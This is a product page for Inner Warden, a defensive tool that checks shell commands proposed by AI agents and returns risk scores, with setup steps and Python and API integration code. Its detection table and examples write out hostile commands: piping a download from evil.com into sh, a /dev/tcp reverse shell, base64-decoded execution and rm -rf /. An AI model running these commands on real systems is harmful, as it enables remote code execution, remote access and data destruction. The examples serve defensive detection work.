AI Agent Protection

Your AI agent runs commands. We make sure they're safe.

AI agents execute commands on your server. Inner Warden checks every command before it runs and warns you if something looks dangerous. Works with OpenClaw, Claude Code, Langchain, CrewAI, n8n, or your own agent.

We never block your agent. We advise. You always know what happened.

How it works

The Trusted Advisor model

Before your agent runs a command, it asks Inner Warden first. The command is analyzed against 71 threat detection rules. Your agent gets a risk score and decides what to do. You see everything.

1

Your agent wants to run a command

Your agent decides it needs to execute something on your server. Before running it, the agent asks Inner Warden if the command is safe.

curl https://example.com/setup.sh | bash
2

Inner Warden analyzes it

The command is analyzed against 71 threat detection rules covering 9 categories: download-and-execute pipelines, reverse shells, obfuscation, prompt injection, and more. It returns a risk score from 0 to 100.

{ "risk_score": 40, "recommendation": "deny", "signals": ["download_and_execute"] }
3

Your agent warns you

If the recommendation is "deny" or "review", your agent tells you what the command does and why it's risky. You decide: approve or reject.

4

Inner Warden keeps watching

Even after a command runs, Inner Warden keeps monitoring. If something flagged as dangerous gets executed, you get a notification immediately.
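From the agent's side, steps 1-3 reduce to a single gate. A minimal sketch in Python (`check` is the JSON response shown in step 2; the function and callback names here are illustrative, not part of the API):

```python
def should_run(check: dict, user_approves=None) -> bool:
    """Gate execution on Inner Warden's verdict (the JSON from step 2)."""
    if check["recommendation"] == "allow":
        return True
    # "review" or "deny": surface the risk and defer to the human (step 3)
    if user_approves is not None:
        return user_approves(check)
    return False
```

The `user_approves` callback is whatever your agent uses to ask a human; defaulting to "no" keeps the agent safe when nobody is watching.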

Three outcomes

What happens when your agent runs a command

Safe command

Risk score below 20. Your agent runs it immediately. No notification needed. Example: systemctl status nginx

Result: command executes normally

Suspicious command

Risk score 20-39. Your agent warns you and asks for approval. Example: chmod +x /tmp/script.sh

Result: you approve or reject

Dangerous command

Risk score 40+. Your agent explains why it's dangerous and suggests alternatives. Example: curl evil.com/x | sh

Result: your agent blocks it, or you override and we notify the owner

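The three tiers above translate directly into agent-side logic. A minimal sketch (the cutoffs come from this page; the function name is ours):

```python
def classify(risk_score: int) -> str:
    """Map an Inner Warden risk score to one of the three outcomes."""
    if risk_score < 20:
        return "safe"        # run immediately, no notification
    if risk_score < 40:
        return "suspicious"  # warn the user and ask for approval
    return "dangerous"       # explain the risk, suggest alternatives
```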
Detection engine

What Inner Warden catches

Not regex matching. Structural analysis using tree-sitter AST parsing. Obfuscation, encoding, and multi-step attacks are detected by behavior, not pattern.

Threat                   Example                       Score
Download + execute       curl evil.com/x | sh          +40
Reverse shell            bash -i >& /dev/tcp/...       +60
Obfuscated command       base64 -d | sh                +30
Temp dir execution       /tmp/payload                  +30
Persistence              crontab, systemctl enable     +20
Destructive operation    rm -rf /                      +50
Staged attack            wget + chmod + execute        +25 bonus

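To see why behavior beats pattern, here is a toy sketch of structural detection: instead of grepping for a known string, split the pipeline into stages and look at what each stage does. This is a deliberately simplified stand-in for Inner Warden's tree-sitter engine, not its actual code:

```python
import shlex

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "zsh"}

def has_download_and_execute(command: str) -> bool:
    """Flag a downloader piped into a shell, whatever the URL or flags."""
    stages = [shlex.split(stage) for stage in command.split("|")]
    return (
        len(stages) >= 2
        and bool(stages[0]) and stages[0][0] in DOWNLOADERS
        and bool(stages[-1]) and stages[-1][0] in SHELLS
    )
```

A substring blocklist would need one entry per URL and flag combination; inspecting the pipeline's shape catches the whole family at once.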
Setup

Get it running in 3 minutes

Two ways to set it up. Pick whichever fits your situation.

Easiest

Let OpenClaw install everything

Install the Inner Warden skill from ClawHub. When you use it for the first time, it detects that Inner Warden is not installed and walks you through the setup. One conversation, fully guided.

openclaw skills install innerwarden-security

Then just talk to OpenClaw: "check my server security". It handles the rest: installs Inner Warden, enables protection, configures the API.

VirusTotal verdict: "Benign". View on ClawHub

Already have Inner Warden

Enable the protection module

One command. This activates command monitoring, file integrity checks, and the advisor API that OpenClaw connects to automatically.

innerwarden enable openclaw-protection

OpenClaw detects the running instance on localhost:8787 and starts validating commands automatically. No extra configuration needed.

Either way, once connected, OpenClaw checks every command with Inner Warden before executing. No API keys to manage. Everything stays on localhost.

Trust model

We advise. Your agent decides. You always know.

We never block your agent
Inner Warden is an advisor, not a firewall. Your agent keeps full autonomy. We analyze and recommend, we don't intercept.
We always watch
40 eBPF hooks in the kernel track every process, connection, and file access. Even if your agent doesn't ask first, we see what it does.
We always tell you
If your agent ignores a "deny" recommendation and runs the command anyway, you get a Telegram notification with the command, risk score, and why we flagged it.
Not another LLM
The command analysis uses deterministic AST parsing (tree-sitter). It can't be fooled by prompt injection. It's math, not magic.
Any AI agent

One HTTP call. Any agent.

Add one HTTP call before your agent executes a command. Works with any framework: OpenClaw, Langchain, CrewAI, n8n, or custom code.

Before your agent runs a command
# Check if a command is safe
curl -s -X POST http://localhost:8787/api/agent/check-command \
  -H "Content-Type: application/json" \
  -d '{"command": "your-command-here"}'

# Response:
# {
#   "risk_score": 0,
#   "recommendation": "allow",   <- safe to run
#   "signals": []
# }

# If recommendation is "deny" or "review",
# show the user the signals and ask before running.
Python (works with Langchain, CrewAI, or any custom agent)
import requests, subprocess

def safe_execute(command: str) -> str:
    # Ask Inner Warden first
    check = requests.post(
        "http://localhost:8787/api/agent/check-command",
        json={"command": command}
    ).json()

    signals = ", ".join(check["signals"]) or "no signals"

    if check["recommendation"] == "deny":
        return f"Blocked (risk {check['risk_score']}): {signals}"

    if check["recommendation"] == "review":
        print(f"Warning (risk {check['risk_score']}): {signals}")
        # Ask the user for approval here before continuing

    return subprocess.check_output(
        command, shell=True, text=True
    )
n8n (use an HTTP Request node before Execute Command)

Add an HTTP Request node that calls POST http://localhost:8787/api/agent/check-command with the command in the body. Route the output: if recommendation is "allow", proceed to the Execute Command node. Otherwise, send a notification and stop.

The API runs on localhost:8787. No external calls, no API keys for the check itself. If you configured dashboard auth, pass a Bearer token in the header.
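With dashboard auth enabled, the same check simply carries one extra header. A standard-library sketch (`YOUR_TOKEN` is a placeholder for your own token):

```python
import json
import urllib.request

payload = json.dumps({"command": "systemctl status nginx"}).encode()
req = urllib.request.Request(
    "http://localhost:8787/api/agent/check-command",
    data=payload,
    headers={
        "Content-Type": "application/json",
        "Authorization": "Bearer YOUR_TOKEN",  # only if dashboard auth is enabled
    },
)
# with urllib.request.urlopen(req) as resp:
#     check = json.load(resp)
```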

Your server defends itself. Your agent stays safe.

Install Inner Warden. Enable the protection module. One API call per command. Full validation for any AI agent. Apache-2.0.